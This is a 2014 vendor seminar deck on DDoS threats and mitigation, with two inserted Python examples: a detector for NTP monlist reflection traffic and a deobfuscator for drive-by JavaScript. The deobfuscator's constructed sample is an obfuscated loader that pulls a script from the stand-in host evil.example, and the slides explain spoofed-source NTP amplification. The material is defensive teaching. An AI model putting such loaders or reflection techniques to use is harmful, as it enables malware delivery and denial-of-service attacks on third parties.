Protection from DDoS attack is now your responsibility, but help is at hand
Mark Tilston, Senior Cyber-Security Engineer, PHOENIX DATACOM
2nd December 2014
Welcome
www.phoenixdatacom.com
Phoenix Datacom, our core competencies
Now in our 30th year, Phoenix Datacom is the UK's most technically competent provider of solutions and professional services to enhance the performance & security of cloud, physical and virtual networks.
We serve customers in: Finance | Enterprises | Government/Defence | Carriers | Mobile Operators
Solutions | Support | Professional Services
• Network Data Access for Test, Monitoring & Load Balancing: locating just the data you need in order to see further return from your security and monitoring investments
• Application Performance Monitoring & Improvement: resolving bottlenecks and other issues before they affect the performance of applications and staff productivity
• Cyber-Security Protection & Testing: protecting your critical infrastructure from the threats of cyber-crime whilst saving you significant time and money
• Network Performance Testing & Validation: helping you to build, test, validate and monitor your business-critical cloud, physical and virtual networks
Solutions to enhance the performance & security of your networks & applications
Solution demonstrations available in our….
Phoenix Datacom, core security solutions – Monitoring / Mediation / Remediation
[Network diagram: Internet/WAN with a remote worker and a hacker/intruder outside the perimeter; the site with CFO, CEO, CISO, HR Department and hot-desking; example hosts for Finance, HR, Legal, Exchange and Intranet; application servers on-site and in the Cloud. Solution points marked on the diagram:]
• Perimeter Firewall: Standard FW rules
• Next-Generation Firewall for Application Control
• Next-Generation Intrusion Detection and Protection
• Zero-Day Malware & APT Execution
• DDoS Protection, Prevention and Mitigation
• Network, LAN and Computer Forensics
• Threat Vulnerability Management & Assessment
• Advanced Network & DC Cloaking
• Stateful Attack Generation
Phoenix Datacom, core security solutions – Our focus today
[Same network diagram (Internet/WAN, hacker/intruder, remote worker, site hosts and application servers on-site and in the Cloud), with the Perimeter Firewall (standard FW rules) shown for context and two solution points highlighted:]
• DDoS Protection, Prevention and Mitigation
• Stateful Attack Generation
The focus here today…
Agenda:
• The latest DDoS attack threat spectrum targeting Enterprises, the Government and Financial Organisations – Arbor Networks
• How local DDoS protection combined with Carrier protection provides the most effective incident response and remediation – Arbor Networks
• The importance of knowing the capability of your DDoS Mitigation measures, as well as new solutions under consideration – Ixia (BreakingPoint)
• A live demo of DDoS attacks against the Arbor Networks DDoS Mitigation solution for Enterprises, the Government and Financial Organisations – Phoenix Datacom
Better Protection from Cyber-Threats
Darren Anstee, Director of Solution Architects, ARBOR NETWORKS
Threats in the news…
Cost | Disruption | Loss of Customer Trust
The threat space is complex…
[Advanced Threat Continuum / New Advanced Threat Landscape: threats against Availability, Integrity and Confidentiality, ranging from Quiet & Patient to Loud & Noisy]
DDoS evolution
[Chart: Peak Monthly Gbps of Attacks, plotted by month over several years; the two highest peaks are labelled 325.05 Gbps and 264.61 Gbps.]

Period   Average attack size (bps)   % change   Peak attack size (bps)   % change
Q1       1.12 Gbps                   -          325.06 Gbps              -
Q2       759.83 Mbps                 -32.2%     154.69 Gbps              -52.4%
Q3       858.98 Mbps                 +13.05%    264.61 Gbps              +71.1%
2014, a time for reflection…
Characteristics of an NTP Reflection/Amplification Attack
[Diagram: attacker, abusable Internet-accessible NTP servers (servers, routers, home CPE devices, etc.), and the target]
Characteristics of an NTP Reflection/Amplification Attack
The attacker sends monlist, showpeers or other NTP mode 6/mode 7 administrative queries to the abusable NTP servers, with the target's IP address spoofed as the source and the chosen target port as the source port.
Characteristics of an NTP Reflection/Amplification Attack
The NTP services 'reply' to the attack target with streams of ~468-byte packets sourced from UDP/123; the destination port is the source port the attacker chose while generating the NTP queries (in the diagram, target port UDP/80 or UDP/123).
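The exchange described on the three slides above, as an added example that is neither Arbor's nor Phoenix Datacom's code: a small classifier that recognises mode 7 monlist queries and replies from the NTP header, builds the 440-byte reply payload that the slide's ~468-byte wire size corresponds to, computes the payload amplification, and flags the host that receives such replies from several servers in a constructed capture. The packet tuples, the documentation-range addresses and the sample traffic are constructed for the example; the mode 7 header layout and the MON_GETLIST request codes 20 and 42 follow ntpd's ntp_request.h.

```python
"""Flag NTP monlist (mode 7) reflection traffic in a packet capture.
Added example on constructed packets; not a real capture and not vendor code."""
import struct
from collections import defaultdict

NTP_PORT = 123
MODE_PRIVATE = 7          # NTP mode 7: implementation-specific; monlist lives here
IMPL_XNTPD = 3            # implementation number used by ntpd
MON_GETLIST = 20          # monlist request codes, from ntpd's ntp_request.h
MON_GETLIST_1 = 42
MONLIST_ENTRY = 72        # bytes per monlist entry; ntpd packs 6 per reply packet


def ntp_mode(payload):
    """3-bit mode field from the first NTP header byte (None if too short)."""
    return payload[0] & 0x07 if len(payload) >= 4 else None


def is_monlist(payload):
    """True for a mode 7 packet whose request code is MON_GETLIST(_1)."""
    return (ntp_mode(payload) == MODE_PRIVATE
            and payload[3] in (MON_GETLIST, MON_GETLIST_1))


def is_response(payload):
    """Mode 7 replies set the top (R) bit of byte 0."""
    return bool(payload[0] & 0x80)


def monlist_request():
    """8-byte query: R=0 M=0 VN=2 mode=7, seq 0, impl XNTPD, MON_GETLIST_1."""
    return bytes([0x17, 0x00, IMPL_XNTPD, MON_GETLIST_1, 0, 0, 0, 0])


def monlist_response(nitems=6):
    """One reply packet: 8-byte header (R bit set, err=0/nitems, mbz=0/itemsize)
    plus nitems * 72 bytes of entries = 440 bytes of UDP payload, i.e. the
    ~468 bytes on the wire once the 20-byte IP and 8-byte UDP headers are added."""
    hdr = bytes([0x97, 0x00, IMPL_XNTPD, MON_GETLIST_1])
    hdr += struct.pack("!HH", nitems, MONLIST_ENTRY)
    return hdr + bytes(nitems * MONLIST_ENTRY)


def amplification(request, responses):
    """Bytes returned per byte sent, counting UDP payload only."""
    return sum(len(r) for r in responses) / len(request)


def find_reflection_victims(packets, min_reflectors=3):
    """packets: iterable of (src_ip, src_port, dst_ip, dst_port, payload).
    Returns {victim: {"reflectors": set, "packets": n, "bytes": n, "dst_ports": set}}
    for hosts receiving monlist replies (source UDP/123) from >= min_reflectors
    distinct servers. Only the replies reach the victim; the spoofed queries went
    to the reflectors, so the replies are what a perimeter sensor actually sees."""
    stats = defaultdict(lambda: {"reflectors": set(), "packets": 0,
                                 "bytes": 0, "dst_ports": set()})
    for src, sport, dst, dport, payload in packets:
        if sport != NTP_PORT or not is_monlist(payload) or not is_response(payload):
            continue
        s = stats[dst]
        s["reflectors"].add(src)
        s["packets"] += 1
        s["bytes"] += len(payload)
        s["dst_ports"].add(dport)
    return {v: s for v, s in stats.items() if len(s["reflectors"]) >= min_reflectors}


# --- constructed capture (documentation addresses, not real hosts) ---
VICTIM = "203.0.113.10"
REFLECTORS = ["198.51.100.%d" % i for i in range(1, 5)]


def sample_capture():
    pkts = []
    req = monlist_request()
    for r in REFLECTORS:                       # spoofed queries: src = victim, sport 80
        pkts.append((VICTIM, 80, r, NTP_PORT, req))
    for r in REFLECTORS:                       # each reflector answers the victim on UDP/80
        for _ in range(3):
            pkts.append((r, NTP_PORT, VICTIM, 80, monlist_response()))
    client = bytes([0x23]) + bytes(47)         # benign mode 3 client poll (LI=0 VN=4)
    server = bytes([0x24]) + bytes(47)         # and its mode 4 server reply
    pkts.append(("192.0.2.50", 50123, REFLECTORS[0], NTP_PORT, client))
    pkts.append((REFLECTORS[0], NTP_PORT, "192.0.2.50", 50123, server))
    return pkts


if __name__ == "__main__":
    for victim, s in find_reflection_victims(sample_capture()).items():
        print(victim, len(s["reflectors"]), "reflectors,", s["packets"], "pkts,",
              s["bytes"], "bytes to ports", sorted(s["dst_ports"]))
    print("payload amplification of one query answered by 3 packets: %.0fx"
          % amplification(monlist_request(), [monlist_response()] * 3))
```

The check a practitioner wants on the other side of this is whether their own NTP servers are abusable: `ntpdc -n -c monlist <server>` from an outside host should return nothing. `disable monitor` in ntp.conf (or an ntpd at 4.2.7p26 or later, where monlist was removed) closes the hole, and the usual `restrict default ... noquery` line stops the mode 6/7 queries altogether.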
2014 ATLAS Initiative: Anonymous Stats, World-Wide
Other Protocols for Amplification, Q3
• Given the huge storm of NTP reflection activity, there has been some focus on other protocols that can be used in this way.
• Looking at attacks with source ports of services used for reflection.
• DNS has been used by attackers for several years.
• Lower proportion of events for SNMP reflection this quarter compared to last. Chargen grows slightly.
• Significant growth in attacks with source port 1900 (SSDP): almost no attacks in Q2, 29506 in Q3.

Protocol   UDP source port   Percentage of attacks, Q3   Max size, Q3   Average size, Q3
SNMP       161               0.03%                       14.46 Gbps     856 Mbps
Chargen    19                2%                          24.8 Gbps      1.05 Gbps
DNS        53                4%                          83.9 Gbps      1.7 Gbps
SSDP       1900              4%                          124 Gbps       4.04 Gbps
NTP        123               5%                          156.3 Gbps     2.99 Gbps
DDoS Evolution
Confidentiality / Integrity Threats
Huge number of 'ways in'
• Many Threat Vectors: Drive By Download, SPAM/Phishing, Watering Hole, Walk-in, USB
• New AND Old
• IPS / AV: limited coverage
• Patching lag
Leveraging vulnerabilities in:
• JavaScript
• Java applets
• Compound Documents
• Anything Adobe
[Chart: Threats On Corporate Network, scale 0–60, by category: Advanced Persistent Threat; Botted or Compromised Hosts; Under-capacity for bandwidth; Industrial Espionage; Malicious Insider; Other]
What does JavaScript obfuscation look like?
And in the real world…
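An added example for the two slides above (a constructed loader snippet, not the screenshots' code and not anything from Arbor or Phoenix Datacom): a static pass that peels off the obfuscation layers these samples usually start with, namely String.fromCharCode() arrays, unescape() percent-encoding, \x and \u escapes, string concatenation and single-use variables, and then pulls the URL out of the decoded strings. The snippet, the host name evil.example and the variable names are constructed; real kits add eval() and packer layers on top, which this pass deliberately does not execute.

```python
"""Peel the simplest obfuscation layers off a JavaScript snippet and pull out
indicators. Added example on a constructed sample; real kits wrap eval() and
packer stages around this, which a static pass like this will not resolve."""
import json
import re

STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')                  # double-quoted literals
FROMCHARCODE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+?)\s*\)')
UNESCAPE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')
VARDEF = re.compile(r'var\s+([A-Za-z_]\w*)\s*=\s*("(?:[^"\\]|\\.)*")\s*;')
URL = re.compile(r'https?://[^\s"\'<>]+')


def _lit(text):
    """Render text as a double-quoted JS literal."""
    return json.dumps(text)


def _unquote(lit):
    """Decode a double-quoted literal (\\xNN, \\uNNNN, \\" ...); ASCII content only."""
    return lit[1:-1].encode().decode("unicode_escape")


def _pct_decode(s):
    """unescape() semantics: %uNNNN and %NN sequences."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def _outside_strings(js, fn):
    """Apply fn to the code between string literals, leaving literals intact."""
    out, pos = [], 0
    for m in STRING.finditer(js):
        out.append(fn(js[pos:m.start()]))
        out.append(m.group(0))
        pos = m.end()
    out.append(fn(js[pos:]))
    return "".join(out)


def _round(js):
    # 1. String.fromCharCode(104,116,...) -> "ht..."
    js = FROMCHARCODE.sub(
        lambda m: _lit("".join(chr(int(n)) for n in m.group(1).split(","))), js)
    # 2. unescape("%3C%u0041") -> "<A"
    js = UNESCAPE.sub(lambda m: _lit(_pct_decode(m.group(1))), js)
    # 3. normalise \x / \u escapes inside every literal
    js = STRING.sub(lambda m: _lit(_unquote(m.group(0))), js)
    # 4. fold "a" + "b" -> "ab" until nothing is left to fold
    while True:
        folded = CONCAT.sub(lambda m: _lit(_unquote('"%s"' % m.group(1))
                                           + _unquote('"%s"' % m.group(2))), js)
        if folded == js:
            break
        js = folded
    # 5. inline `var x = "literal";` at each use of x outside string literals.
    #    Naive on purpose: only names defined exactly once, and \b matching means
    #    obj.x would be hit too; good enough for loader-style snippets.
    defs = VARDEF.findall(js)
    for name, lit in defs:
        if sum(1 for n, _ in defs if n == name) != 1:
            continue                                   # reassigned: leave it alone
        js = re.sub(r'var\s+%s\s*=\s*"(?:[^"\\]|\\.)*"\s*;' % re.escape(name), "", js)
        pat = re.compile(r'\b%s\b' % re.escape(name))
        js = _outside_strings(js, lambda seg, p=pat, l=lit: p.sub(lambda _: l, seg))
    return js


def deobfuscate(js, max_rounds=10):
    """Repeat the passes until a fixed point (or max_rounds), drop blank lines."""
    for _ in range(max_rounds):
        nxt = _round(js)
        if nxt == js:
            break
        js = nxt
    return "\n".join(l for l in js.splitlines() if l.strip())


def extract_urls(js):
    """URLs found inside the (decoded) string literals of js."""
    found = []
    for m in STRING.finditer(js):
        found.extend(URL.findall(_unquote(m.group(0))))
    return found


# --- constructed sample, modelled on a drive-by loader: NOT real malware ---
SAMPLE = r'''
var s = String.fromCharCode(104,116,116,112,58,47,47);
var h = "\x65\x76\x69\x6c\x2e\x65\x78\x61\x6d\x70\x6c\x65";
document.write(unescape("%3Cscript%20src%3D%22") + s + h + "/p.js\"></script>");
'''

if __name__ == "__main__":
    clean = deobfuscate(SAMPLE)
    print(clean)
    print("URLs:", extract_urls(clean))
```

The order of the passes matters: escapes and fromCharCode are decoded before concatenation is folded, and variables are inlined last, so each round exposes one more layer and the loop stops when a round changes nothing. Treat the output as triage data (the injected script URL to block and hunt for), not as proof the sample is fully understood.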
Bot builder with anti-detection
So, how do organisations improve defenses?
• Actionable Threat Intelligence: use the expertise within vendors and integrators to maximise your own effectiveness.
• Ensure Availability: many organisations are now reliant on the Internet for their business continuity.
• Broad & Deep Visibility: identify suspicious or malicious activities wherever they occur; packet capture at key network locations to monitor critical assets.
• Workflow: solutions that fit into an IR workflow and enable personnel and processes.
Actionable Threat Intelligence
[ATLAS pipeline diagram:]
• ATLAS Security Community, honeypots & SPAM traps: 300K malware samples/day
• Sandbox of virtual machines runs the malware (looking for botnet C&C, files, network behaviour)
• Millions of family samples; auto-classification and analysis every 24 hrs; AIF policy
• DDoS 'Tracker': report and PCAP of each DDoS attack stored in database
Ensure Availability
Pravail Availability Protection System (APS)
• Immediate protection from current threats: utilise ATLAS threat intelligence to protect your organisation from the latest threats.
• Easy to install and deploy: easy to operationalize and deploy; built-in bypass functionality; detailed traffic and reporting for advanced users.
• (Arbor) Cloud Signaling: integration with cloud-based DDoS protection services to provide the automated, layered protection necessary to deal with multi-vector attacks.
[Diagram: Global Internet Threats and the Global Network outside; APS at the Enterprise Perimeter in front of the servers; Internal Network and Enterprise Assets behind it. Files, Packets & Flow feed the Identify / Understand / Act cycle.]